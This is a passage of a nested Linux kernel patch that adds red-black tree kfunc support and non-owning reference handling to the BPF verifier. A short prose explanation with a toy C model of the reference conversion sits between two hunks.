++	__mark_reg_not_init(env, &callee->regs[BPF_REG_4]);
++	__mark_reg_not_init(env, &callee->regs[BPF_REG_5]);
++	callee->in_callback_fn = true;
++	callee->callback_ret_range = tnum_range(0, 1);
++	return 0;
++}
++
++static bool is_rbtree_lock_required_kfunc(u32 btf_id);
++
++/* Are we currently verifying the callback for a rbtree helper that must
++ * be called with lock held? If so, no need to complain about unreleased
++ * lock
++ */
++static bool in_rbtree_lock_required_cb(struct bpf_verifier_env *env)
++{
++	struct bpf_verifier_state *state = env->cur_state;
++	struct bpf_insn *insn = env->prog->insnsi;
++	struct bpf_func_state *callee;
++	int kfunc_btf_id;
++
++	if (!state->curframe)
++		return false;
++
++	callee = state->frame[state->curframe];
++
++	if (!callee->in_callback_fn)
++		return false;
++
++	kfunc_btf_id = insn[callee->callsite].imm;
++	return is_rbtree_lock_required_kfunc(kfunc_btf_id);
++}
++
+ static int prepare_func_exit(struct bpf_verifier_env *env, int *insn_idx)
+ {
+ 	struct bpf_verifier_state *state = env->cur_state;
+@@ -8395,6 +8509,7 @@ struct bpf_kfunc_call_arg_meta {
+ 	bool r0_rdonly;
+ 	u32 ret_btf_id;
+ 	u64 r0_size;
++	u32 subprogno;
+ 	struct {
+ 		u64 value;
+ 		bool found;
+@@ -8406,6 +8521,9 @@ struct bpf_kfunc_call_arg_meta {
+ 	struct {
+ 		struct btf_field *field;
+ 	} arg_list_head;
++	struct {
++		struct btf_field *field;
++	} arg_rbtree_root;
+ };
+ 
+ static bool is_kfunc_acquire(struct bpf_kfunc_call_arg_meta *meta)
+@@ -8517,12 +8635,16 @@ enum {
+ 	KF_ARG_DYNPTR_ID,
+ 	KF_ARG_LIST_HEAD_ID,
+ 	KF_ARG_LIST_NODE_ID,
++	KF_ARG_RB_ROOT_ID,
++	KF_ARG_RB_NODE_ID,
+ };
+ 
+ BTF_ID_LIST(kf_arg_btf_ids)
+ BTF_ID(struct, bpf_dynptr_kern)
+ BTF_ID(struct, bpf_list_head)
+ BTF_ID(struct, bpf_list_node)
++BTF_ID(struct, bpf_rb_root)
++BTF_ID(struct, bpf_rb_node)
+ 
+ static bool __is_kfunc_ptr_arg_type(const struct btf *btf,
+ 				    const struct btf_param *arg, int type)
+@@ -8556,6 +8678,28 @@ static bool is_kfunc_arg_list_node(const struct btf *btf, const struct btf_param
+ 	return __is_kfunc_ptr_arg_type(btf, arg, KF_ARG_LIST_NODE_ID);
+ }
+ 
++static bool is_kfunc_arg_rbtree_root(const struct btf *btf, const struct btf_param *arg)
++{
++	return __is_kfunc_ptr_arg_type(btf, arg, KF_ARG_RB_ROOT_ID);
++}
++
++static bool is_kfunc_arg_rbtree_node(const struct btf *btf, const struct btf_param *arg)
++{
++	return __is_kfunc_ptr_arg_type(btf, arg, KF_ARG_RB_NODE_ID);
++}
++
++static bool is_kfunc_arg_callback(struct bpf_verifier_env *env, const struct btf *btf,
++				  const struct btf_param *arg)
++{
++	const struct btf_type *t;
++
++	t = btf_type_resolve_func_ptr(btf, arg->type, NULL);
++	if (!t)
++		return false;
++
++	return true;
++}
++
+ /* Returns true if struct is composed of scalars, 4 levels of nesting allowed */
+ static bool __btf_type_is_scalar_struct(struct bpf_verifier_env *env,
+ 					const struct btf *btf,
+@@ -8615,6 +8759,9 @@ enum kfunc_ptr_arg_type {
+ 	KF_ARG_PTR_TO_BTF_ID,	     /* Also covers reg2btf_ids conversions */
+ 	KF_ARG_PTR_TO_MEM,
+ 	KF_ARG_PTR_TO_MEM_SIZE,	     /* Size derived from next argument, skip it */
++	KF_ARG_PTR_TO_CALLBACK,
++	KF_ARG_PTR_TO_RB_ROOT,
++	KF_ARG_PTR_TO_RB_NODE,
+ };
+ 
+ enum special_kfunc_type {
+@@ -8628,6 +8775,9 @@ enum special_kfunc_type {
+ 	KF_bpf_rdonly_cast,
+ 	KF_bpf_rcu_read_lock,
+ 	KF_bpf_rcu_read_unlock,
++	KF_bpf_rbtree_remove,
++	KF_bpf_rbtree_add,
++	KF_bpf_rbtree_first,
+ };
+ 
+ BTF_SET_START(special_kfunc_set)
+@@ -8639,6 +8789,9 @@ BTF_ID(func, bpf_list_pop_front)
+ BTF_ID(func, bpf_list_pop_back)
+ BTF_ID(func, bpf_cast_to_kern_ctx)
+ BTF_ID(func, bpf_rdonly_cast)
++BTF_ID(func, bpf_rbtree_remove)
++BTF_ID(func, bpf_rbtree_add)
++BTF_ID(func, bpf_rbtree_first)
+ BTF_SET_END(special_kfunc_set)
+ 
+ BTF_ID_LIST(special_kfunc_list)
+@@ -8652,6 +8805,9 @@ BTF_ID(func, bpf_cast_to_kern_ctx)
+ BTF_ID(func, bpf_rdonly_cast)
+ BTF_ID(func, bpf_rcu_read_lock)
+ BTF_ID(func, bpf_rcu_read_unlock)
++BTF_ID(func, bpf_rbtree_remove)
++BTF_ID(func, bpf_rbtree_add)
++BTF_ID(func, bpf_rbtree_first)
+ 
+ static bool is_kfunc_bpf_rcu_read_lock(struct bpf_kfunc_call_arg_meta *meta)
+ {
+@@ -8713,6 +8869,12 @@ get_kfunc_ptr_arg_type(struct bpf_verifier_env *env,
+ 	if (is_kfunc_arg_list_node(meta->btf, &args[argno]))
+ 		return KF_ARG_PTR_TO_LIST_NODE;
+ 
++	if (is_kfunc_arg_rbtree_root(meta->btf, &args[argno]))
++		return KF_ARG_PTR_TO_RB_ROOT;
++
++	if (is_kfunc_arg_rbtree_node(meta->btf, &args[argno]))
++		return KF_ARG_PTR_TO_RB_NODE;
++
+ 	if ((base_type(reg->type) == PTR_TO_BTF_ID || reg2btf_ids[base_type(reg->type)])) {
+ 		if (!btf_type_is_struct(ref_t)) {
+ 			verbose(env, "kernel function %s args#%d pointer type %s %s is not supported\n",
+@@ -8722,6 +8884,9 @@ get_kfunc_ptr_arg_type(struct bpf_verifier_env *env,
+ 		return KF_ARG_PTR_TO_BTF_ID;
+ 	}
+ 
++	if (is_kfunc_arg_callback(env, meta->btf, &args[argno]))
++		return KF_ARG_PTR_TO_CALLBACK;
++
+ 	if (argno + 1 < nargs && is_kfunc_arg_mem_size(meta->btf, &args[argno + 1], &regs[regno + 1]))
+ 		arg_mem_size = true;
+ 
+@@ -8808,38 +8973,54 @@ static int process_kf_arg_ptr_to_kptr(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
+-static int ref_set_release_on_unlock(struct bpf_verifier_env *env, u32 ref_obj_id)
++static int ref_set_non_owning(struct bpf_verifier_env *env, struct bpf_reg_state *reg)
+ {
+-	struct bpf_func_state *state = cur_func(env);
++	struct bpf_verifier_state *state = env->cur_state;
++
++	if (!state->active_lock.ptr) {
++		verbose(env, "verifier internal error: ref_set_non_owning w/o active lock\n");
++		return -EFAULT;
++	}
++
++	if (type_flag(reg->type) & NON_OWN_REF) {
++		verbose(env, "verifier internal error: NON_OWN_REF already set\n");
++		return -EFAULT;
++	}
++
++	reg->type |= NON_OWN_REF;
++	return 0;
++}
++
++static int ref_convert_owning_non_owning(struct bpf_verifier_env *env, u32 ref_obj_id)
++{
++	struct bpf_func_state *state, *unused;
+ 	struct bpf_reg_state *reg;
+ 	int i;
+ 
+-	/* bpf_spin_lock only allows calling list_push and list_pop, no BPF
+-	 * subprogs, no global functions. This means that the references would
+-	 * not be released inside the critical section but they may be added to
+-	 * the reference state, and the acquired_refs are never copied out for a
+-	 * different frame as BPF to BPF calls don't work in bpf_spin_lock
+-	 * critical sections.
+-	 */
++	state = cur_func(env);
++
+ 	if (!ref_obj_id) {
+-		verbose(env, "verifier internal error: ref_obj_id is zero for release_on_unlock\n");
++		verbose(env, "verifier internal error: ref_obj_id is zero for "
++			     "owning -> non-owning conversion\n");
+ 		return -EFAULT;
+ 	}
++
+ 	for (i = 0; i < state->acquired_refs; i++) {
+-		if (state->refs[i].id == ref_obj_id) {
+-			if (state->refs[i].release_on_unlock) {
+-				verbose(env, "verifier internal error: expected false release_on_unlock");
+-				return -EFAULT;
++		if (state->refs[i].id != ref_obj_id)
++			continue;
++
++		/* Clear ref_obj_id here so release_reference doesn't clobber
++		 * the whole reg
++		 */
++		bpf_for_each_reg_in_vstate(env->cur_state, unused, reg, ({
++			if (reg->ref_obj_id == ref_obj_id) {
++				reg->ref_obj_id = 0;
++				ref_set_non_owning(env, reg);
+ 			}
+-			state->refs[i].release_on_unlock = true;
+-			/* Now mark everyone sharing same ref_obj_id as untrusted */
+-			bpf_for_each_reg_in_vstate(env->cur_state, state, reg, ({
+-				if (reg->ref_obj_id == ref_obj_id)
+-					reg->type |= PTR_UNTRUSTED;
+-			}));
+-			return 0;
+-		}
++		}));
++		return 0;
+ 	}
++
+ 	verbose(env, "verifier internal error: ref state missing for ref_obj_id\n");
+ 	return -EFAULT;
+ }
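
ref_convert_owning_non_owning(), added above, walks every register in the
verifier state and downgrades all aliases of the just-released object: each
alias's ref_obj_id is cleared and the NON_OWN_REF flag set, replacing the
old release_on_unlock machinery. A toy model of that walk (the flag value
and register layout here are hypothetical):

    #include <stdio.h>

    #define NON_OWN_REF 0x1   /* illustrative flag value, not the kernel's */

    struct reg { int ref_obj_id; unsigned type_flags; };

    /* hypothetical mini-version of the conversion walk */
    static void convert_owning_to_non_owning(struct reg *regs, int n, int id)
    {
        for (int i = 0; i < n; i++) {
            if (regs[i].ref_obj_id == id) {
                regs[i].ref_obj_id = 0;        /* no longer owns the object */
                regs[i].type_flags |= NON_OWN_REF;
            }
        }
    }

    int main(void)
    {
        struct reg regs[3] = { { 7, 0 }, { 3, 0 }, { 7, 0 } }; /* r0, r2 alias */

        convert_owning_to_non_owning(regs, 3, 7);
        for (int i = 0; i < 3; i++)
            printf("r%d: ref_obj_id=%d non_own=%d\n", i,
                   regs[i].ref_obj_id, !!(regs[i].type_flags & NON_OWN_REF));
        return 0;
    }
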
+@@ -8925,101 +9106,226 @@ static bool is_bpf_list_api_kfunc(u32 btf_id)
+ 	       btf_id == special_kfunc_list[KF_bpf_list_pop_back];
+ }
+ 
+-static int process_kf_arg_ptr_to_list_head(struct bpf_verifier_env *env,
+-					   struct bpf_reg_state *reg, u32 regno,
+-					   struct bpf_kfunc_call_arg_meta *meta)
++static bool is_bpf_rbtree_api_kfunc(u32 btf_id)
++{
++	return btf_id == special_kfunc_list[KF_bpf_rbtree_add] ||
++	       btf_id == special_kfunc_list[KF_bpf_rbtree_remove] ||
++	       btf_id == special_kfunc_list[KF_bpf_rbtree_first];
++}
++
++static bool is_bpf_graph_api_kfunc(u32 btf_id)
+ {
++	return is_bpf_list_api_kfunc(btf_id) || is_bpf_rbtree_api_kfunc(btf_id);
++}
++
++static bool is_callback_calling_kfunc(u32 btf_id)
++{
++	return btf_id == special_kfunc_list[KF_bpf_rbtree_add];
++}
++
++static bool is_rbtree_lock_required_kfunc(u32 btf_id)
++{
++	return is_bpf_rbtree_api_kfunc(btf_id);
++}
++
++static bool check_kfunc_is_graph_root_api(struct bpf_verifier_env *env,
++					  enum btf_field_type head_field_type,
++					  u32 kfunc_btf_id)
++{
++	bool ret;
++
++	switch (head_field_type) {
++	case BPF_LIST_HEAD:
++		ret = is_bpf_list_api_kfunc(kfunc_btf_id);
++		break;
++	case BPF_RB_ROOT:
++		ret = is_bpf_rbtree_api_kfunc(kfunc_btf_id);
++		break;
++	default:
++		verbose(env, "verifier internal error: unexpected graph root argument type %s\n",
++			btf_field_type_name(head_field_type));
++		return false;
++	}
++
++	if (!ret)
++		verbose(env, "verifier internal error: %s head arg for unknown kfunc\n",
++			btf_field_type_name(head_field_type));
++	return ret;
++}
++
++static bool check_kfunc_is_graph_node_api(struct bpf_verifier_env *env,
++					  enum btf_field_type node_field_type,
++					  u32 kfunc_btf_id)
++{
++	bool ret;
++
++	switch (node_field_type) {
++	case BPF_LIST_NODE:
++		ret = (kfunc_btf_id == special_kfunc_list[KF_bpf_list_push_front] ||
++		       kfunc_btf_id == special_kfunc_list[KF_bpf_list_push_back]);
++		break;
++	case BPF_RB_NODE:
++		ret = (kfunc_btf_id == special_kfunc_list[KF_bpf_rbtree_remove] ||
++		       kfunc_btf_id == special_kfunc_list[KF_bpf_rbtree_add]);
++		break;
++	default:
++		verbose(env, "verifier internal error: unexpected graph node argument type %s\n",
++			btf_field_type_name(node_field_type));
++		return false;
++	}
++
++	if (!ret)
++		verbose(env, "verifier internal error: %s node arg for unknown kfunc\n",
++			btf_field_type_name(node_field_type));
++	return ret;
++}
++
++static int
++__process_kf_arg_ptr_to_graph_root(struct bpf_verifier_env *env,
++				   struct bpf_reg_state *reg, u32 regno,
++				   struct bpf_kfunc_call_arg_meta *meta,
++				   enum btf_field_type head_field_type,
++				   struct btf_field **head_field)
++{
++	const char *head_type_name;
+ 	struct btf_field *field;
+ 	struct btf_record *rec;
+-	u32 list_head_off;
++	u32 head_off;
+ 
+-	if (meta->btf != btf_vmlinux || !is_bpf_list_api_kfunc(meta->func_id)) {
+-		verbose(env, "verifier internal error: bpf_list_head argument for unknown kfunc\n");
++	if (meta->btf != btf_vmlinux) {
++		verbose(env, "verifier internal error: unexpected btf mismatch in kfunc call\n");
+ 		return -EFAULT;
+ 	}
+ 
++	if (!check_kfunc_is_graph_root_api(env, head_field_type, meta->func_id))
++		return -EFAULT;
++
++	head_type_name = btf_field_type_name(head_field_type);
+ 	if (!tnum_is_const(reg->var_off)) {
+ 		verbose(env,
+-			"R%d doesn't have constant offset. bpf_list_head has to be at the constant offset\n",
+-			regno);
++			"R%d doesn't have constant offset. %s has to be at the constant offset\n",
++			regno, head_type_name);
+ 		return -EINVAL;
+ 	}
+ 
+ 	rec = reg_btf_record(reg);
+-	list_head_off = reg->off + reg->var_off.value;
+-	field = btf_record_find(rec, list_head_off, BPF_LIST_HEAD);
++	head_off = reg->off + reg->var_off.value;
++	field = btf_record_find(rec, head_off, head_field_type);
+ 	if (!field) {
+-		verbose(env, "bpf_list_head not found at offset=%u\n", list_head_off);
++		verbose(env, "%s not found at offset=%u\n", head_type_name, head_off);
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* All functions require bpf_list_head to be protected using a bpf_spin_lock */
+ 	if (check_reg_allocation_locked(env, reg)) {
+-		verbose(env, "bpf_spin_lock at off=%d must be held for bpf_list_head\n",
+-			rec->spin_lock_off);
++		verbose(env, "bpf_spin_lock at off=%d must be held for %s\n",
++			rec->spin_lock_off, head_type_name);
+ 		return -EINVAL;
+ 	}
+ 
+-	if (meta->arg_list_head.field) {
+-		verbose(env, "verifier internal error: repeating bpf_list_head arg\n");
++	if (*head_field) {
++		verbose(env, "verifier internal error: repeating %s arg\n", head_type_name);
+ 		return -EFAULT;
+ 	}
+-	meta->arg_list_head.field = field;
++	*head_field = field;
+ 	return 0;
+ }
+ 
+-static int process_kf_arg_ptr_to_list_node(struct bpf_verifier_env *env,
++static int process_kf_arg_ptr_to_list_head(struct bpf_verifier_env *env,
+ 					   struct bpf_reg_state *reg, u32 regno,
+ 					   struct bpf_kfunc_call_arg_meta *meta)
+ {
++	return __process_kf_arg_ptr_to_graph_root(env, reg, regno, meta, BPF_LIST_HEAD,
++							  &meta->arg_list_head.field);
++}
++
++static int process_kf_arg_ptr_to_rbtree_root(struct bpf_verifier_env *env,
++					     struct bpf_reg_state *reg, u32 regno,
++					     struct bpf_kfunc_call_arg_meta *meta)
++{
++	return __process_kf_arg_ptr_to_graph_root(env, reg, regno, meta, BPF_RB_ROOT,
++							  &meta->arg_rbtree_root.field);
++}
++
++static int
++__process_kf_arg_ptr_to_graph_node(struct bpf_verifier_env *env,
++				   struct bpf_reg_state *reg, u32 regno,
++				   struct bpf_kfunc_call_arg_meta *meta,
++				   enum btf_field_type head_field_type,
++				   enum btf_field_type node_field_type,
++				   struct btf_field **node_field)
++{
++	const char *node_type_name;
+ 	const struct btf_type *et, *t;
+ 	struct btf_field *field;
+-	struct btf_record *rec;
+-	u32 list_node_off;
++	u32 node_off;
+ 
+-	if (meta->btf != btf_vmlinux ||
+-	    (meta->func_id != special_kfunc_list[KF_bpf_list_push_front] &&
+-	     meta->func_id != special_kfunc_list[KF_bpf_list_push_back])) {
+-		verbose(env, "verifier internal error: bpf_list_node argument for unknown kfunc\n");
++	if (meta->btf != btf_vmlinux) {
++		verbose(env, "verifier internal error: unexpected btf mismatch in kfunc call\n");
+ 		return -EFAULT;
+ 	}
+ 
++	if (!check_kfunc_is_graph_node_api(env, node_field_type, meta->func_id))
++		return -EFAULT;
++
++	node_type_name = btf_field_type_name(node_field_type);
+ 	if (!tnum_is_const(reg->var_off)) {
+ 		verbose(env,
+-			"R%d doesn't have constant offset. bpf_list_node has to be at the constant offset\n",
+-			regno);
++			"R%d doesn't have constant offset. %s has to be at the constant offset\n",
++			regno, node_type_name);
+ 		return -EINVAL;
+ 	}
+ 
+-	rec = reg_btf_record(reg);
+-	list_node_off = reg->off + reg->var_off.value;
+-	field = btf_record_find(rec, list_node_off, BPF_LIST_NODE);
+-	if (!field || field->offset != list_node_off) {
+-		verbose(env, "bpf_list_node not found at offset=%u\n", list_node_off);
++	node_off = reg->off + reg->var_off.value;
++	field = reg_find_field_offset(reg, node_off, node_field_type);
++	if (!field || field->offset != node_off) {
++		verbose(env, "%s not found at offset=%u\n", node_type_name, node_off);
+ 		return -EINVAL;
+ 	}
+ 
+-	field = meta->arg_list_head.field;
++	field = *node_field;
+ 
+-	et = btf_type_by_id(field->list_head.btf, field->list_head.value_btf_id);
++	et = btf_type_by_id(field->graph_root.btf, field->graph_root.value_btf_id);
+ 	t = btf_type_by_id(reg->btf, reg->btf_id);
+-	if (!btf_struct_ids_match(&env->log, reg->btf, reg->btf_id, 0, field->list_head.btf,
+-				  field->list_head.value_btf_id, true)) {
+-		verbose(env, "operation on bpf_list_head expects arg#1 bpf_list_node at offset=%d "
++	if (!btf_struct_ids_match(&env->log, reg->btf, reg->btf_id, 0, field->graph_root.btf,
++				  field->graph_root.value_btf_id, true)) {
++		verbose(env, "operation on %s expects arg#1 %s at offset=%d "
+ 			"in struct %s, but arg is at offset=%d in struct %s\n",
+-			field->list_head.node_offset, btf_name_by_offset(field->list_head.btf, et->name_off),
+-			list_node_off, btf_name_by_offset(reg->btf, t->name_off));
++			btf_field_type_name(head_field_type),
++			btf_field_type_name(node_field_type),
++			field->graph_root.node_offset,
++			btf_name_by_offset(field->graph_root.btf, et->name_off),
++			node_off, btf_name_by_offset(reg->btf, t->name_off));
+ 		return -EINVAL;
+ 	}
+ 
+-	if (list_node_off != field->list_head.node_offset) {
+-		verbose(env, "arg#1 offset=%d, but expected bpf_list_node at offset=%d in struct %s\n",
+-			list_node_off, field->list_head.node_offset,
+-			btf_name_by_offset(field->list_head.btf, et->name_off));
++	if (node_off != field->graph_root.node_offset) {
++		verbose(env, "arg#1 offset=%d, but expected %s at offset=%d in struct %s\n",
++			node_off, btf_field_type_name(node_field_type),
++			field->graph_root.node_offset,
++			btf_name_by_offset(field->graph_root.btf, et->name_off));
+ 		return -EINVAL;
+ 	}
+-	/* Set arg#1 for expiration after unlock */
+-	return ref_set_release_on_unlock(env, reg->ref_obj_id);
++
++	return 0;
++}
++
++static int process_kf_arg_ptr_to_list_node(struct bpf_verifier_env *env,
++					   struct bpf_reg_state *reg, u32 regno,
++					   struct bpf_kfunc_call_arg_meta *meta)
++{
++	return __process_kf_arg_ptr_to_graph_node(env, reg, regno, meta,
++						  BPF_LIST_HEAD, BPF_LIST_NODE,
++						  &meta->arg_list_head.field);
++}
++
++static int process_kf_arg_ptr_to_rbtree_node(struct bpf_verifier_env *env,
++					     struct bpf_reg_state *reg, u32 regno,
++					     struct bpf_kfunc_call_arg_meta *meta)
++{
++	return __process_kf_arg_ptr_to_graph_node(env, reg, regno, meta,
++						  BPF_RB_ROOT, BPF_RB_NODE,
++						  &meta->arg_rbtree_root.field);
+ }
+ 
+ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_arg_meta *meta)
+@@ -9150,8 +9456,11 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 		case KF_ARG_PTR_TO_DYNPTR:
+ 		case KF_ARG_PTR_TO_LIST_HEAD:
+ 		case KF_ARG_PTR_TO_LIST_NODE:
++		case KF_ARG_PTR_TO_RB_ROOT:
++		case KF_ARG_PTR_TO_RB_NODE:
+ 		case KF_ARG_PTR_TO_MEM:
+ 		case KF_ARG_PTR_TO_MEM_SIZE:
++		case KF_ARG_PTR_TO_CALLBACK:
+ 			/* Trusted by default */
+ 			break;
+ 		default:
+@@ -9228,6 +9537,20 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
++		case KF_ARG_PTR_TO_RB_ROOT:
++			if (reg->type != PTR_TO_MAP_VALUE &&
++			    reg->type != (PTR_TO_BTF_ID | MEM_ALLOC)) {
++				verbose(env, "arg#%d expected pointer to map value or allocated object\n", i);
++				return -EINVAL;
++			}
++			if (reg->type == (PTR_TO_BTF_ID | MEM_ALLOC) && !reg->ref_obj_id) {
++				verbose(env, "allocated object must be referenced\n");
++				return -EINVAL;
++			}
++			ret = process_kf_arg_ptr_to_rbtree_root(env, reg, regno, meta);
++			if (ret < 0)
++				return ret;
++			break;
+ 		case KF_ARG_PTR_TO_LIST_NODE:
+ 			if (reg->type != (PTR_TO_BTF_ID | MEM_ALLOC)) {
+ 				verbose(env, "arg#%d expected pointer to allocated object\n", i);
+@@ -9241,6 +9564,19 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
++		case KF_ARG_PTR_TO_RB_NODE:
++			if (reg->type != (PTR_TO_BTF_ID | MEM_ALLOC)) {
++				verbose(env, "arg#%d expected pointer to allocated object\n", i);
++				return -EINVAL;
++			}
++			if (!reg->ref_obj_id) {
++				verbose(env, "allocated object must be referenced\n");
++				return -EINVAL;
++			}
++			ret = process_kf_arg_ptr_to_rbtree_node(env, reg, regno, meta);
++			if (ret < 0)
++				return ret;
++			break;
+ 		case KF_ARG_PTR_TO_BTF_ID:
+ 			/* Only base_type is checked, further checks are done here */
+ 			if ((base_type(reg->type) != PTR_TO_BTF_ID ||
+@@ -9276,6 +9612,9 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 			/* Skip next '__sz' argument */
+ 			i++;
+ 			break;
++		case KF_ARG_PTR_TO_CALLBACK:
++			meta->subprogno = reg->subprogno;
++			break;
+ 		}
+ 	}
+ 
+@@ -9288,24 +9627,21 @@ static int check_kfunc_args(struct bpf_verifier_env *env, struct bpf_kfunc_call_
+ 	return 0;
+ }
+ 
+-static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+-			    int *insn_idx_p)
++static int fetch_kfunc_meta(struct bpf_verifier_env *env,
++			    struct bpf_insn *insn,
++			    struct bpf_kfunc_call_arg_meta *meta,
++			    const char **kfunc_name)
+ {
+-	const struct btf_type *t, *func, *func_proto, *ptr_type;
+-	struct bpf_reg_state *regs = cur_regs(env);
+-	const char *func_name, *ptr_type_name;
+-	bool sleepable, rcu_lock, rcu_unlock;
+-	struct bpf_kfunc_call_arg_meta meta;
+-	u32 i, nargs, func_id, ptr_type_id;
+-	int err, insn_idx = *insn_idx_p;
+-	const struct btf_param *args;
+-	const struct btf_type *ret_t;
++	const struct btf_type *func, *func_proto;
++	u32 func_id, *kfunc_flags;
++	const char *func_name;
+ 	struct btf *desc_btf;
+-	u32 *kfunc_flags;
+ 
+-	/* skip for now, but return error when we find this in fixup_kfunc_call */
++	if (kfunc_name)
++		*kfunc_name = NULL;
++
+ 	if (!insn->imm)
+-		return 0;
++		return -EINVAL;
+ 
+ 	desc_btf = find_kfunc_desc_btf(env, insn->off);
+ 	if (IS_ERR(desc_btf))
+@@ -9314,22 +9650,51 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 	func_id = insn->imm;
+ 	func = btf_type_by_id(desc_btf, func_id);
+ 	func_name = btf_name_by_offset(desc_btf, func->name_off);
++	if (kfunc_name)
++		*kfunc_name = func_name;
+ 	func_proto = btf_type_by_id(desc_btf, func->type);
+ 
+ 	kfunc_flags = btf_kfunc_id_set_contains(desc_btf, resolve_prog_type(env->prog), func_id);
+ 	if (!kfunc_flags) {
+-		verbose(env, "calling kernel function %s is not allowed\n",
+-			func_name);
+ 		return -EACCES;
+ 	}
+ 
+-	/* Prepare kfunc call metadata */
+-	memset(&meta, 0, sizeof(meta));
+-	meta.btf = desc_btf;
+-	meta.func_id = func_id;
+-	meta.kfunc_flags = *kfunc_flags;
+-	meta.func_proto = func_proto;
+-	meta.func_name = func_name;
++	memset(meta, 0, sizeof(*meta));
++	meta->btf = desc_btf;
++	meta->func_id = func_id;
++	meta->kfunc_flags = *kfunc_flags;
++	meta->func_proto = func_proto;
++	meta->func_name = func_name;
++
++	return 0;
++}
++
++static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
++			    int *insn_idx_p)
++{
++	const struct btf_type *t, *ptr_type;
++	u32 i, nargs, ptr_type_id, release_ref_obj_id;
++	struct bpf_reg_state *regs = cur_regs(env);
++	const char *func_name, *ptr_type_name;
++	bool sleepable, rcu_lock, rcu_unlock;
++	struct bpf_kfunc_call_arg_meta meta;
++	struct bpf_insn_aux_data *insn_aux;
++	int err, insn_idx = *insn_idx_p;
++	const struct btf_param *args;
++	const struct btf_type *ret_t;
++	struct btf *desc_btf;
++
++	/* skip for now, but return error when we find this in fixup_kfunc_call */
++	if (!insn->imm)
++		return 0;
++
++	err = fetch_kfunc_meta(env, insn, &meta, &func_name);
++	if (err == -EACCES && func_name)
++		verbose(env, "calling kernel function %s is not allowed\n", func_name);
++	if (err)
++		return err;
++	desc_btf = meta.btf;
++	insn_aux = &env->insn_aux_data[insn_idx];
+ 
+ 	if (is_kfunc_destructive(&meta) && !capable(CAP_SYS_BOOT)) {
+ 		verbose(env, "destructive kfunc calls require CAP_SYS_BOOT capability\n");
+@@ -9386,7 +9751,36 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 		err = release_reference(env, regs[meta.release_regno].ref_obj_id);
+ 		if (err) {
+ 			verbose(env, "kfunc %s#%d reference has not been acquired before\n",
+-				func_name, func_id);
++				func_name, meta.func_id);
++			return err;
++		}
++	}
++
++	if (meta.func_id == special_kfunc_list[KF_bpf_list_push_front] ||
++	    meta.func_id == special_kfunc_list[KF_bpf_list_push_back] ||
++	    meta.func_id == special_kfunc_list[KF_bpf_rbtree_add]) {
++		release_ref_obj_id = regs[BPF_REG_2].ref_obj_id;
++		err = ref_convert_owning_non_owning(env, release_ref_obj_id);
++		if (err) {
++			verbose(env, "kfunc %s#%d conversion of owning ref to non-owning failed\n",
++				func_name, meta.func_id);
++			return err;
++		}
++
++		err = release_reference(env, release_ref_obj_id);
++		if (err) {
++			verbose(env, "kfunc %s#%d reference has not been acquired before\n",
++				func_name, meta.func_id);
++			return err;
++		}
++	}
++
++	if (meta.func_id == special_kfunc_list[KF_bpf_rbtree_add]) {
++		err = __check_func_call(env, insn, insn_idx_p, meta.subprogno,
++					set_rbtree_add_callback_state);
++		if (err) {
++			verbose(env, "kfunc %s#%d failed callback verification\n",
++				func_name, meta.func_id);
+ 			return err;
+ 		}
+ 	}
+@@ -9395,7 +9789,7 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 		mark_reg_not_init(env, regs, caller_saved[i]);
+ 
+ 	/* Check return type */
+-	t = btf_type_skip_modifiers(desc_btf, func_proto->type, NULL);
++	t = btf_type_skip_modifiers(desc_btf, meta.func_proto->type, NULL);
+ 
+ 	if (is_kfunc_acquire(&meta) && !btf_type_is_struct_ptr(meta.btf, t)) {
+ 		/* Only exception is bpf_obj_new_impl */
+@@ -9444,22 +9838,18 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 				regs[BPF_REG_0].btf = ret_btf;
+ 				regs[BPF_REG_0].btf_id = ret_btf_id;
+ 
+-				env->insn_aux_data[insn_idx].obj_new_size = ret_t->size;
+-				env->insn_aux_data[insn_idx].kptr_struct_meta =
++				insn_aux->obj_new_size = ret_t->size;
++				insn_aux->kptr_struct_meta =
+ 					btf_find_struct_meta(ret_btf, ret_btf_id);
+-			} else if (meta.func_id == special_kfunc_list[KF_bpf_obj_drop_impl]) {
+-				env->insn_aux_data[insn_idx].kptr_struct_meta =
+-					btf_find_struct_meta(meta.arg_obj_drop.btf,
+-							     meta.arg_obj_drop.btf_id);
+ 			} else if (meta.func_id == special_kfunc_list[KF_bpf_list_pop_front] ||
+ 				   meta.func_id == special_kfunc_list[KF_bpf_list_pop_back]) {
+ 				struct btf_field *field = meta.arg_list_head.field;
+ 
+ 				mark_reg_known_zero(env, regs, BPF_REG_0);
+ 				regs[BPF_REG_0].type = PTR_TO_BTF_ID | MEM_ALLOC;
+-				regs[BPF_REG_0].btf = field->list_head.btf;
+-				regs[BPF_REG_0].btf_id = field->list_head.value_btf_id;
+-				regs[BPF_REG_0].off = field->list_head.node_offset;
++				regs[BPF_REG_0].btf = field->graph_root.btf;
++				regs[BPF_REG_0].btf_id = field->graph_root.value_btf_id;
++				regs[BPF_REG_0].off = field->graph_root.node_offset;
+ 			} else if (meta.func_id == special_kfunc_list[KF_bpf_cast_to_kern_ctx]) {
+ 				mark_reg_known_zero(env, regs, BPF_REG_0);
+ 				regs[BPF_REG_0].type = PTR_TO_BTF_ID | PTR_TRUSTED;
+@@ -9528,10 +9918,18 @@ static int check_kfunc_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 		}
+ 		if (reg_may_point_to_spin_lock(&regs[BPF_REG_0]) && !regs[BPF_REG_0].id)
